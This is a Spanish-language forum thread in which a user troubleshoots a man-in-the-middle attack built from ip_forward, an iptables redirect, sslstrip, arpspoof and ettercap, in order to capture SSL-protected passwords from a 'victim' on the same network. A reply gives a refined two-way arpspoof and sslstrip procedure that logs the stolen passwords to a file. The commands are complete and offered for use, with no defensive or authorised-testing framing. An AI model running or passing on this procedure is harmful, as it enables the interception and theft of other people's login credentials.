Internet se desconecta luego de usar ettercap

Iniciado por scardenasz, 27 Diciembre 2011, 06:01 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

scardenasz

27 Diciembre 2011, 06:01 AM
Mostraré los pasos que hago para poder sacar contraseñas protegidas por SSL, y el momento en el que se me desconecta internet (Luego tengo que reiniciar el pc, puesto que no vuelve a conectarse mas).

1) Pongo la maquina en modo ip_fordward = 1
Código [Seleccionar]
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Redireccion el trafico http del puerto 80 al 1000 con iptables
Código [Seleccionar]
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

3)Corro sslstrip en el puerto 1000
Código [Seleccionar]
sslstrip.py -l 1000

4)Corro arpspoof
Código [Seleccionar]
arpspoof -i interface -t iptarget iprouter

5)Corro ettercap
Código [Seleccionar]
ettercap -Tqz -u -i interface
NOTA= agrego el -u para que no me cambie el ipforward a 0, ya que ettercap por defecto lo hace.

Este procedimiento lo hice en 2 lugares distintos, en uno conectados con un Router D-link DI-524.
Tuve el problema de que la victima se caía continuamente.

En el otro conectados con un modem inalambrico motorola SBG900, sin embargo en este apenas empiezo a correr ettercap, se me cae a mi el internet.

Datos importantes:

trabajo en debian 6, 2.6.32-5-686.
mi tarjeta de red es una Broadcom BCM4312.

nota 2 = no uso la tarjeta en modo monitor, ya que veo que en ocasiones mucho mejor en modo managed.

Muchas gracias

H1tchclock

#2
14 Enero 2012, 23:10 PM
Cita de: alpha015 en  2 Enero 2012, 00:25 AM
Te recomiendo que uses Wireshark:

Wireshark Ettercap...... ;-)
Mi inteligencia es proporcional al tiempo que invierto en internet

darkvidhack

#3
21 Enero 2012, 17:37 PM
Hola!! en teoría, poniendo a 1 el ip_forward, no debería darte problemas, aún así, yo hago lo siguiente:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

arpspoof -i interface -t iptarget iprouter
arpspoof -i interface -t iprouter iptarget

sslstrip -w fichero.txt

Si solo quieres passwords del protocolo https (protocolo SsL), no te hace falta ettercap, el mismo sslstrip te las almacena en 'fichero.txt'

Saludos ;)
live and let die

la duda es la base de todo conocimiento
Imprimir
Ir Arriba Páginas1
Acciones del Usuario